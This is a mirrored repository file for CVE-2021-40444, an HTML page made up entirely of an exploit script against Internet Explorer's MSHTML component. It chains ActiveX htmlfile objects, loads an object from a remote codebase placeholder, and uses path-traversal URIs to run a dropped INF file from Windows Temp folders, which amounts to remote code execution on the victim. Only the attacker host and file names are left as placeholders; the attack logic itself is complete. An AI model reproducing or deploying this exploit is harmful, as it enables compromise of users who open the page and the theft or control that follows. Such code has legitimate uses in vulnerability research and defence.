mirror of
https://github.com/klezVirus/CVE-2021-40444.git
synced 2024-11-23 22:10:48 +00:00
70 lines
4.9 KiB
HTML
70 lines
4.9 KiB
HTML
<!DOCTYPE html>
|
|
<html>
|
|
<head>
|
|
<meta http-equiv="Expires" content="-1">
|
|
<meta http-equiv="X-UA-Compatible" content="IE=11">
|
|
</head>
|
|
<body>
|
|
<script>
|
|
function garbage() {
|
|
return 'garbage';
|
|
}
|
|
(function exploit() {
|
|
var iframe = window["Document"]['prototype']['createElement']['call'](window["document"], 'iframe');
|
|
try {
|
|
window["HTMLElement"]["prototype"]["appendChild"]['call'](window["document"]['body'], iframe);
|
|
} catch (_0x1ab454) {
|
|
window["HTMLElement"]["prototype"]["appendChild"]['call'](window["document"]['documentElement'], iframe);
|
|
}
|
|
var htmlfile = iframe['contentWindow']['ActiveXObject'], htmlfile2 = new htmlfile('htmlfile');
|
|
iframe['contentDocument']['open']()['close']();
|
|
try {
|
|
window["HTMLElement"]["prototype"]["removeChild"]['call'](window["document"]['body'], iframe);
|
|
} catch (_0x3b004e) {
|
|
window["HTMLElement"]["prototype"]["removeChild"]['call'](window["document"]['documentElement'], iframe);
|
|
}
|
|
htmlfile2['open']()['close']();
|
|
var htmlfile3 = new htmlfile2[('Script')]['ActiveXObject']('htmlfile');
|
|
htmlfile3['open']()['close']();
|
|
var htmlfile4 = new htmlfile3[('Script')]['ActiveXObject']('htmlfile');
|
|
htmlfile4['open']()['close']();
|
|
var htmlfile5 = new htmlfile4[('Script')]['ActiveXObject']('htmlfile');
|
|
htmlfile5['open']()['close']();
|
|
var ActiveXObjectVAR = new ActiveXObject('htmlfile')
|
|
, ActiveXObjectVAR2 = new ActiveXObject('htmlfile')
|
|
, ActiveXObjectVAR3 = new ActiveXObject('htmlfile')
|
|
, ActiveXObjectVAR4 = new ActiveXObject('htmlfile')
|
|
, ActiveXObjectVAR5 = new ActiveXObject('htmlfile')
|
|
, ActiveXObjectVAR6 = new ActiveXObject('htmlfile')
|
|
, XMLHttpR = new window['XMLHttpRequest']()
|
|
, XMLHttpRopen = window['XMLHttpRequest']['prototype']['open']
|
|
, XMLHttpRsend = window['XMLHttpRequest']['prototype']['send'];
|
|
XMLHttpRopen['call'](XMLHttpR, 'GET', '<HOST_CHANGE_HERE>', ![]),
|
|
XMLHttpRsend['call'](XMLHttpR),
|
|
htmlfile5['Script']['document']['write']('body>');
|
|
var htmlScript = window["Document"]['prototype']['createElement']['call'](htmlfile5['Script']['document'], 'object');
|
|
htmlScript['setAttribute']('codebase', '<HOST_CHANGE_HERE>#version=5,0,0,0');
|
|
htmlScript['setAttribute']('CLSID:edbc374c-5730-432a-b5b8-de94f0b57217'),
|
|
window["HTMLElement"]["prototype"]["appendChild"]['call'](htmlfile5['Script']['document']['body'], htmlScript),
|
|
ActiveXObjectVAR['Script']['location'] = '<URI_SCHEME_HERE>:123?<URI_SCHEME_HERE>',
|
|
ActiveXObjectVAR['Script']['location'] = '<URI_SCHEME_HERE>:123?<URI_SCHEME_HERE>',
|
|
ActiveXObjectVAR['Script']['location'] = '<URI_SCHEME_HERE>:123?<URI_SCHEME_HERE>',
|
|
ActiveXObjectVAR['Script']['location'] = '<URI_SCHEME_HERE>:123?<URI_SCHEME_HERE>',
|
|
ActiveXObjectVAR['Script']['location'] = '<URI_SCHEME_HERE>:123?<URI_SCHEME_HERE>',
|
|
ActiveXObjectVAR['Script']['location'] = '<URI_SCHEME_HERE>:123?<URI_SCHEME_HERE>',
|
|
ActiveXObjectVAR['Script']['location'] = '<URI_SCHEME_HERE>:123?<URI_SCHEME_HERE>',
|
|
ActiveXObjectVAR['Script']['location'] = '<URI_SCHEME_HERE>:123?<URI_SCHEME_HERE>',
|
|
ActiveXObjectVAR['Script']['location'] = '<URI_SCHEME_HERE>:123?<URI_SCHEME_HERE>',
|
|
ActiveXObjectVAR['Script']['location'] = '<URI_SCHEME_HERE>:../../../AppData/Local/Temp/Low/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>',
|
|
ActiveXObjectVAR2['Script']['location'] = '<URI_SCHEME_HERE>:../../../AppData/Local/Temp/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>',
|
|
ActiveXObjectVAR3['Script']['location'] = '<URI_SCHEME_HERE>:../../../../AppData/Local/Temp/Low/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>',
|
|
ActiveXObjectVAR4['Script']['location'] = '<URI_SCHEME_HERE>:../../../../AppData/Local/Temp/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>',
|
|
ActiveXObjectVAR5['Script']['location'] = '<URI_SCHEME_HERE>:../../../../../Temp/Low/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>',
|
|
ActiveXObjectVAR4['Script']['location'] = '<URI_SCHEME_HERE>:../../../../../Temp/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>',
|
|
ActiveXObjectVAR4['Script']['location'] = '<URI_SCHEME_HERE>:../../Low/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>',
|
|
ActiveXObjectVAR4['Script']['location'] = '<URI_SCHEME_HERE>:../../<INF_CHANGE_HERE>?<URI_SCHEME_HERE>';
|
|
}());
|
|
</script>
|
|
</body>
|
|
</html>
|